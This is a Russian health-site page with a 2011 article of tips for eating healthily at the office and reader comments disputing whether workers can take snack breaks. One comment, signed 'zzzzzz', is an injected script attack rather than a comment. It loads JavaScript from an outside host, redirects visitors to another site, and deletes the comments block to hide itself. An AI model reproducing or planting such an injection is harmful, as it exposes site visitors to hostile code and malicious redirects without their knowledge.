Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Здоровое питание в офисе  >>  Здоровое питание в офисе
 
Обратная связь
 

Здоровое питание в офисе

Размер шрифта
17 августа 2011 07:01
  • google_analytics: false
  • Нравится

Итак, вы решили, что питание должно быть правильным. Решение отличное, но помните: на пути ждет много препон. За каждым углом рабочего места подстерегает нездоровая пища, готовая в любой момент испортить ваш выверенный рацион.

Здоровое питание в офисе

Виктор Миронов / «Здоровье инфо»

После того как вы решили сказать решительное «нет» неправильному питанию, вы можете обнаружить, что коллеги практически находятся в негласном заговоре против вас. То вкусный тортик на очередной день рождения вам предложат, то домашнее печенье поднесут, то вовсе обидятся на ваш отказ от высококалорийного салатика. Не успеешь оглянуться, как мечты о здоровом питании погребены под гамбургерами, чипсами и рулетами.

Попробуйте выставить на пути нездоровой пищи укрепленную линию из наших семи советов.

  1. Просто скажите «нет». Вслух. Не обязательно кричать, это может помочь, даже если вы шепчете. Это простой и доступный способ отказаться от бессмысленной еды и больше к этому вопросу не возвращаться.

  2. Приносите с собой не только обед, но и закуски. Часто офисная еда не имеет ничего общего с чувством голода. Еда может быть способом отвлечься от рутинного задания, методом побороть стресс после выволочки у начальника. Не надо налегать на печенье, принесите с собой, например, пакетик моркови.

  3. Ведите пищевой дневник. Это может показаться скучным (мало что ли на работе бюрократии и лишних бумажек?), но поможет четко выявить все отклонения от правильного режима питания, а также понять закономерности, при которых вам приходится идти на поводу у коллег, не придерживающихся ваших взглядов на питание.

 Здоровое питание в офисе

  1. Составьте план. Раз есть время читать интернет-публикации, значит и на план найдется пять минут. Вот прямо сейчас садитесь и расписывайте на неделю вперед, что и в какой день вы будете есть. Четко выстраивайте стратегию поведения с «неожиданной» едой. На дворе среда, а вас угощают? А что у вас по расписанию? Торт только по пятницам? Тогда извините, коллеги, ничего личного...

  2. Не терзайте себя голодом. Если деловая встреча в 12.00, а обед по плану в 12.30, лучше пообедайте в 11.30. Не позволяйте себе голодать из-за работы. Голод плохо влияет на организм по целому ряду факторов, например, сбивает баланс сахара в крови.

  3. Поговорите с начальником. Если на вашем предприятии заказываются корпоративные обеды или стоят автоматы с бутербродами и шоколадками, может, и ваши интересы будут учитываться? Забота о своем и общественном здоровье – дело похвальное. Кто знает, быть может, ваш нестандартный подход начальник оценит и… вместе с вами сядет на диету.

  4. Ищите единомышленников. Объясните коллегам свой выбор (вы же сделали его осознанно), приведите аргументы в пользу здорового питания. Это не только поможет наставить коллектив на путь истинный, но и будет способствовать контролю за тем, что вы едите со стороны единомышленников.

Для того чтобы питаться правильно, иногда требуется мужество и решительность, но только так вы сможете добиться результатов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

02 февраля 2013 в 19:48

Цитировать   |   Пожаловаться

Интересно где обитает такое начальство ,которое будет молча смотреть на все (каждые 4 часа) перекусы и беганье в туалет(после 2 литров воды)? Я вот таких не знаю!!! Положенный обед (1 раз) и все! Упаси Бог  увидит кто что ты жуешь в неположенное на это время.И лишний раз выйти не дадут! Уволят без суда и следствия... Какой уж тут здоровый образ жизни!!!!

2 - Гость

03 февраля 2013 в 09:21

Цитировать   |   Пожаловаться

Это точно. Рабочий день начинается в 9.00. Затем с 13 до 14 обеденное время и до 19.00 опять рабочий день. Сплошным потоком идут люди. Когда и самое главное где перекусывать? У нас очень много людей заняты в сфере обслуживания и жевать при посетителях потому что у тебя здоровое питание и наступило время перекуса по меньшей мере неприлично. Ни один начальник не одобрит такого положения вещей. Потом домой попадаешь к 20.00, естественно голодный как волк. Что посоветуете съесть и во сколько? Или просто лечь спать , чтоб есть не хотелось? Пока вопросов больше, чем ответов...Далеко не все сидят в кабинетах за закрытыми дверями и могут позволить себе перекусы в любое время. Жду ваших советов.

Гость 03 февраля 2013 в 09:21
домой попадаешь к 20.00, естественно голодный как волк. Что посоветуете съесть и во сколько?
 Только находить возможность и между 13 и 19 организовать себе еще один прием пищи. Это возможно. И это - те самые "правила игры", которые в данном случае обязательны к выполнению.  

4 - Гость

06 февраля 2013 в 15:39

Цитировать   |   Пожаловаться

К сожалению,невозможно.Когда работаешь на линии(на заводе) и на обед всего полчаса,и уйти не можешь ни на секунду,т.к линия из-за тебя будет простаивать,мастер вежливо так предложит отдыхать/перекусывать дома,ну просто нереально вести ЗОЖ. А таких как я -миллионы.Нужно быть или хозяином фирмы или домохозяйкой,чтобы регулировать перекусы!

5 - Гость

06 апреля 2013 в 16:44

Цитировать   |   Пожаловаться

Можно подумать, что вся огромная  страна работает в  офисе, а  кто  работает  штукатуром  маляром, или за  конвеерной  лентой, где нельзя отвлечся ни на  минуту, какаой там дневеик записывать, руки в грязных варежках,  просто о туалете мечтаешь. Одно счастье прийти домой и поестьот пуза.  И рабочего класса то большенство. И по чему то о них ни кто не беспокоится, а  об офисном планктоне, как же  они каждый  час не покушают

6 - Гость

26 мая 2014 в 19:00

Цитировать   |   Пожаловаться

у нас на работе разрешают!!!! и не только 4 раза покушать, но и на йогу сходить. а уж попить водички - это сколько хочешь! всё зависит от человека и от желания, главное захотеть. а начальству вашему всегда нужно оставаться людьми и помнить что они такие же люди!

7 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Спросите маму, как вы родились   Напитки для любого настроения. Что пить, чтобы не грустить   Боль в колене: еда против боли   Суперпродукты до и после застолья  
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 24 февраля 2012"СМСмаме" - новая программа для беременных и молодых мам
 
30 ноября 2011Упражнения заставляют нас лучше питаться 27 сентября 2011Картофель – самый полезный овощ?
 

Слайдшоу

1
Что выпить, чтобы лучше работать
Может ли еда победить боль?
Что делать, чтобы новогодние желания сбылись

Тесты

1
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.